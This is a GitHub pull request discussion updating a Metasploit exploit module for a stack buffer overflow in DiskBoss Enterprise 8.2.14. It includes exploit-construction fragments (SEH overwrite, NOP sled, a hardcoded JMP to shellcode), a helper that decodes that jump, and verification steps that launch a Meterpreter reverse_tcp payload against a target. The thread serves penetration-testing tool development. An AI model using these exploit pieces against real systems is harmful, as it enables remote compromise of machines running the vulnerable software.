Update DiskBoss Module (EDB 42395) #9268
Added a new target option for the DiskBoss Server.
'vportal', # Vulnerability discovery and PoC
'Gabor Seljan', # Metasploit module
'Ahmad Mahfouz', # Vulnerability discovery and PoC
'Jacob Robles' # Metasploit module
I'd reorder to put your name next to Gabor's.
sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
sploit << [mytarget.ret].pack('V')
sploit << rand_text_alpha(2500)
if !(mytarget == targets[3])
How about rewriting this to use positive logic?
if mytarget == targets[3]
do_some_stuff
else
do_some_other_stuff
end
sploit << make_nops(10)
sploit << "\xE9\x25\xBF\xFF\xFF" # JMP to ShellCode
sploit << rand_text_alpha(5000 - sploit.length)

Nix this newline when you refactor.
sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
sploit[sploit.length, seh.length] = seh
sploit << make_nops(10)
sploit << "\xE9\x25\xBF\xFF\xFF" # JMP to ShellCode
How about Rex::Arch::X86.jmp(0xffffbf25) and document what the address is?
I took a note to look this up and add it later, will land for now. Thx!
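The encoding behind the reviewer's Rex::Arch::X86.jmp suggestion, as an added example that is not part of the PR or the module: it encodes and decodes an x86 near relative JMP (opcode E9 plus a signed 32-bit displacement) so the hardcoded "\xE9\x25\xBF\xFF\xFF" can be computed from a documented displacement and checked. The helper names are this example's own; jmp_rel32 is assumed to emit the same bytes as Rex::Arch::X86.jmp, which prefixes 0xE9 to the packed dword it is given.

```ruby
# Added example, not module code. A near JMP is E9 followed by a signed
# 32-bit displacement measured from the end of the 5-byte instruction.

# Encode a near JMP. Accepts either a signed displacement (-16603) or the
# same value as an unsigned dword (0xffffbf25), as Rex::Arch::X86.jmp is
# assumed to; both forms produce identical bytes.
def jmp_rel32(disp)
  raise ArgumentError, 'rel32 out of range' unless (-2**31...2**32).cover?(disp)
  "\xE9".b + [disp & 0xFFFFFFFF].pack('V')
end

# Decode a 5-byte near JMP back into its signed displacement.
def jmp_disp(bytes)
  bytes = bytes.b
  unless bytes.bytesize == 5 && bytes.getbyte(0) == 0xE9
    raise ArgumentError, 'not a 5-byte E9 jmp'
  end
  bytes[1, 4].unpack1('l<')
end

# Displacement needed to reach +target+ from a JMP placed at +jmp_addr+.
def disp_for(jmp_addr, target)
  target - (jmp_addr + 5)
end

# Address a JMP at +jmp_addr+ with the given +bytes+ lands on.
def jmp_target(jmp_addr, bytes)
  jmp_addr + 5 + jmp_disp(bytes)
end

# The bytes quoted in the review thread.
HARDCODED_JMP = "\xE9\x25\xBF\xFF\xFF".b

# Describe the hardcoded jump: signed displacement, the unsigned dword form
# that would be handed to Rex::Arch::X86.jmp, and the direction it goes.
def describe(bytes = HARDCODED_JMP)
  d = jmp_disp(bytes)
  { disp: d, dword: d & 0xFFFFFFFF, direction: d.negative? ? 'backward' : 'forward' }
end

if __FILE__ == $0
  info = describe
  printf("JMP rel32 %d (0x%08x): lands %d bytes %s from the instruction end\n",
         info[:disp], info[:dword], info[:disp].abs, info[:direction])
end
```

The decoded displacement is -16603 (0xffffbf25 as a dword), so the "JMP to ShellCode" comment means a jump backwards by that many bytes toward the start of the buffer; that number is what the reviewer asked to have documented next to the call.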
Verified fine for me:
Looks good and thanks, @jrobles-r7! If you wouldn't mind updating the PR with @wvu-r7's feedback whenever is convenient, I can do one more quick verify and land.
I went ahead and made the requested review changes, all except updating the comment to reflect info about the address being JMP'd to.
@@ -127,21 +127,23 @@ def exploit | |||
print_status("Selected Target: #{mytarget.name}") | |||
end | |||
|
|||
if !(mytarget == targets[3]) | |||
case mytarget |
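Review bot: `case mytarget` still dispatches on the target's position in the targets table if its `when` arms compare against `targets[3]` the way the replaced `if !(mytarget == targets[3])` did; since this PR adds a new target, any later reorder of that table silently hands the SEH layout to the wrong target. Suggest keying the branch on a per-target hash entry (alongside the existing `'Offset'` key) or on `mytarget.name` rather than an index.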
Even better!
Release Notes
This patch updates the DiskBoss Enterprise buffer overflow exploit module to also work with v8.2.14.
This is an MSF port of https://www.exploit-db.com/exploits/42395/. The module exploits a stack-based buffer overflow vulnerability in the web interface of DiskBoss Enterprise version 8.2.14. The vulnerable application is available for download at https://www.exploit-db.com/apps/7e7d6455ada0833b6bf11167e43977df-diskbossent_setup_v8.2.14.exe.
Verification
Install DiskBoss Enterprise
Start the DiskBoss Enterprise service
Start the DiskBoss Enterprise client application
Tools > DiskBoss Server Options > Server
Enable Web Server On Port 80 to start the web interface
Start msfconsole
use exploit/windows/http/diskboss_get_bof
set rhost <target IP>
check
set payload windows/meterpreter/reverse_tcp
set lhost <framework system IP>
run